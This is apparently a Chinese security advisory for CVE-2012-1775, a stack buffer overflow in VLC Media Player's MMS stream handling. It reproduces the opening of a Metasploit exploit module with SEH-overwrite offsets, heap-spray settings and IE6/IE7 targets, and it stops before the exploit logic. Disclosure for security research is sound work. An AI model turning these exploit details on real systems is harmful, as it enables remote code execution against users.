VLC Media Player MMS流栈缓冲区溢出漏洞

发布日期：2012-05-03
更新日期：2012-05-07

受影响系统：
VideoLAN VLC Media Player 2.x
不受影响系统：
VideoLAN VLC Media Player 2.0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53391
CVE ID: CVE-2012-1775

VLC Media Player是多媒体播放器（最初命名为VideoLAN客户端）是VideoLAN计划的多媒体播放器。

VLC Media Player 2.0.1之前版本在实现上存在栈缓冲区溢出漏洞，通过特制的 MMS:// 流允许远程攻击者执行任意代码。

<*来源：Florent Hochwelker
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Florent Hochwelker （）提供了如下测试方法：

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})
        super(update_info(info,
            'Name'        => "VLC MMS Stream Handling Buffer Overflow",
            'Description' => %q{
                    This module exploits a buffer overflow in VLC media player VLC media player prior
                to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result
                in a stack buffer overflow when handling a malicious MMS URI.

This module uses the browser as attack vector. A specially crafted MMS URI is
                used to trigger the overflow and get flow control through SEH overwrite. Control
                is transferred to code located in the heap through a standard heap spray.

The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
            },
            'License'     => MSF_LICENSE,
            'Author'      =>
                [
                    'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery
                    'sinn3r', # Metasploit module
                    'juan vazquez' # Metasploit module
                ],
            'References' =>
                [
                    ['CVE', '2012-1775'],
                    ['OSVDB', '80188'],
                    ['URL', 'http://www.videolan.org/security/sa1201.html'],
                    # Fix commit diff
                    ['URL', 'http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c']
                ],
            'Payload' =>
                {
                    'BadChars'        => "\x00",
                    'Space'           => 1000,
                },
            'DefaultOptions' =>
                {
                    'ExitFunction' => "process",
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    # Tested with VLC 2.0.0
                    [ 'Automatic', {} ],
                    [
                        'Internet Explorer 6 on XP SP3',
                        {
                            'Rop' => false,
                            # Space needed to overflow and generate an exception
                            # which allows to get control through SEH overwrite
                            'Offset' => 5488,
                            'OffsetShell' => '0x800 - code.length',
                            'Blocks' => '1550',
                            'Padding' => '0'
                        }
                    ],
                    [
                        'Internet Explorer 7 on XP SP3',
                        {
                            'Rop' => false,
                            # Space needed to overflow and generate an exception
                            # which allows to get control through SEH overwrite
                            'Offset' => 5488,
                            'OffsetShell' => '0x800 - code.length',
                            'Blocks' => '1600',
                            'Padding' => '1'
                        }
                    ]
                ],
            'DisclosureDate' => "Mar 15 2012",
            'DefaultTarget' => 0))